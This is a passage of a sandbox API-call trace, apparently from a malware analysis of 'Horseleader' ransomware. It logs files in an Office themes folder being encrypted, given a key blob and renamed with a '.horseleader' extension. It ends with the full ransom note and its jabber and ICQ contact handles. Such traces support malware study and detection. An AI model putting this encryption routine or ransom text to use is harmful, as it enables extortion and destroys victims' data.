lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.735] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.735] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\.") returned 68 [0247.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.735] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.735] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\..") returned 69 [0247.736] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.736] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, 
ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa2c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.736] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.736] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 78 [0247.736] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.736] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.736] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.736] lstrlenW (lpString=".testttjffg") returned 11 [0247.736] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.736] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.736] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.739] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 78 [0247.739] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.739] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2604) returned 1 [0247.739] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xa2c, lpOverlapped=0x0) returned 1 [0247.741] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff5d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xa2c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xa2c, lpOverlapped=0x0) returned 1 [0247.742] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.743] CloseHandle (hObject=0x1a4) returned 1 [0247.743] GetProcessHeap () returned 0x780000 [0247.743] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.743] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.horseleader") returned 90 [0247.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\ripple\\preview.gif.horseleader")) returned 1 [0247.744] GetProcessHeap () returned 0x780000 [0247.744] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.744] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212c4b00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d2019f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x212c4b00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x101e0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RIPPLE.ELM", cAlternateFileName="")) returned 1 [0247.744] lstrcmpiW (lpString1="RIPPLE.ELM", lpString2="Windows") returned -1 [0247.744] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM") returned 77 [0247.745] StrStrIW (lpFirst="RIPPLE.ELM", lpSrch=".horseleader") returned 0x0 [0247.745] lstrcmpW (lpString1="RIPPLE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.745] lstrcmpW (lpString1="RIPPLE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.745] lstrlenW (lpString=".testttjffg") returned 11 [0247.745] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.745] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.745] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\ripple\\ripple.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM") returned 77 [0247.746] StrStrW (lpFirst="RIPPLE.ELM", lpSrch=".txt") returned 0x0 [0247.747] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=66016) returned 1 [0247.747] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.747] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.752] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.752] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.752] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.752] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.753] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.753] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.753] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb1e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.753] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.754] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.754] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.754] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.755] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.755] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.755] CloseHandle (hObject=0x1a4) returned 1 [0247.755] GetProcessHeap () returned 0x780000 [0247.755] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.755] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM.horseleader") returned 89 [0247.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.elm.horseleader")) returned 1 [0247.759] GetProcessHeap () returned 0x780000 [0247.759] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.759] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RIPPLE.INF", cAlternateFileName="")) returned 1 [0247.760] lstrcmpiW (lpString1="RIPPLE.INF", lpString2="Windows") returned -1 [0247.760] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF") returned 77 [0247.760] StrStrIW (lpFirst="RIPPLE.INF", lpSrch=".horseleader") returned 0x0 [0247.760] lstrcmpW (lpString1="RIPPLE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.760] lstrcmpW (lpString1="RIPPLE.INF", lpString2="_uninstalling_.png") returned 1 [0247.760] lstrlenW (lpString=".testttjffg") returned 11 [0247.760] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF", lpSrch=".testttjffg") returned 0x0 [0247.760] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.760] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.761] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF") returned 77 [0247.761] StrStrW (lpFirst="RIPPLE.INF", lpSrch=".txt") returned 0x0 [0247.761] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=487) returned 1 [0247.761] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e7, lpOverlapped=0x0) returned 1 [0247.763] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.763] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e7, lpOverlapped=0x0) returned 1 [0247.763] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.763] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.764] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.764] CloseHandle (hObject=0x1a4) returned 1 [0247.764] GetProcessHeap () returned 0x780000 [0247.764] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.764] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF.horseleader") returned 89 [0247.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.inf.horseleader")) returned 1 [0247.766] GetProcessHeap () returned 0x780000 [0247.767] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.767] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7ce7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.767] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.767] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 79 [0247.767] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.767] lstrcmpW 
(lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.767] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.767] lstrlenW (lpString=".testttjffg") returned 11 [0247.767] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.767] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.767] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.769] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 79 [0247.769] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.769] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=31975) returned 1 [0247.769] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.773] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.773] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, 
lpOverlapped=0x0) returned 1 [0247.774] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2ce7, lpOverlapped=0x0) returned 1 [0247.774] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd319, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.775] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2ce7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2ce7, lpOverlapped=0x0) returned 1 [0247.775] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.775] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.775] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.775] CloseHandle (hObject=0x1a4) returned 1 [0247.776] GetProcessHeap () returned 0x780000 [0247.776] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.776] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.horseleader") returned 91 [0247.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.horseleader")) returned 1 [0247.777] GetProcessHeap () returned 0x780000 [0247.777] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.778] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7ce7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.778] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.778] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\#Decrypt#.txt") returned 80 [0247.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.779] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
